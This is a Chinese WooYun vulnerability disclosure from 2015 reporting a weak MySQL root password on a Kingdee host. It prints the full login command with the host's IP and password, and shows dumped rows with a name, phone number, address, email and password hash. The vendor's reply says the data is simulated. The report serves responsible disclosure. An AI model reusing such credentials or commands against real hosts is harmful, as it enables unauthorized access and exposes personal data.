漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0115283
漏洞标题:金蝶某主机Mysql弱密码泄露部分员工信息
相关厂商:金蝶
漏洞作者: 撒旦之眼
提交时间:2015-05-21 10:54
修复时间:2015-07-05 11:22
公开时间:2015-07-05 11:22
漏洞类型:服务弱口令
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-05-21: 细节已通知厂商并且等待厂商处理中
2015-05-21: 厂商已经确认,细节仅向厂商公开
2015-05-31: 细节向核心白帽子及相关领域专家公开
2015-06-10: 细节向普通白帽子公开
2015-06-20: 细节向实习白帽子公开
2015-07-05: 细节向公众公开
简要描述:
金蝶某主机mysql弱密码,泄露部分员工信息。
详细说明:
mysql -uroot -p123456 -h218.244.150.94
漏洞证明:
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| aucp |
| jiradb |
| mysql |
| performance_schema |
| pss |
| scrumdb |
| test |
+--------------------+
----------------
id: 1
create_date: 2015-01-29 14:59:53
modify_date: 2015-01-29 14:59:53
address: 株洲市XXXX路XXX号
amount_paid: 0.000000
area_name:
consignee: 陈大旺
coupon_discount: 0.000000
expire: NULL
fee: 0.000000
freight: 0.000000
invoice_title: NULL
is_allocated_stock:
is_invoice:
lock_expire: NULL
memo: NULL
offset_amount: 0.000000
order_status: 0
payment_method_name: 货到付款
payment_status: 0
phone: 18601100111
point: 1350
promotion: NULL
promotion_discount: 0.000000
shipping_method_name: 普通快递
shipping_status: 0
sn: 20150129606
tax: 0.000000
zip_code: 000000
area: NULL
------------------
*************************** 7. row ***************************
ID: 10211
directory_id: 1
user_name: xufeng
lower_user_name: xufeng
active: 1
created_date: 2015-01-27 16:14:13
updated_date: 2015-01-27 16:14:13
first_name:
lower_first_name:
last_name: 徐凤
lower_last_name: 徐凤
display_name: 徐凤
lower_display_name: 徐凤
email_address: [email protected]
lower_email_address: [email protected]
CREDENTIAL: {PKCS5S2}qeIYyiBqjdB9CPQrLhn+uKysIpsdGvY0GXrKO24IYIIYWLckNA7KxliAAdEQvUtz
deleted_externally: NULL
7 rows in set (0.01 sec)
修复方案:
不要使用弱密码且尽量不要允许外连。
版权声明:转载请注明来源 撒旦之眼@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2015-05-21 11:21
厂商回复:
谢谢关注金蝶安全,为我们发现系统漏洞。此系统为测试系统,数据为模拟数据。但反映公司人员安全意识薄弱,我们将进行内部通报。再次感谢!
最新状态:
暂无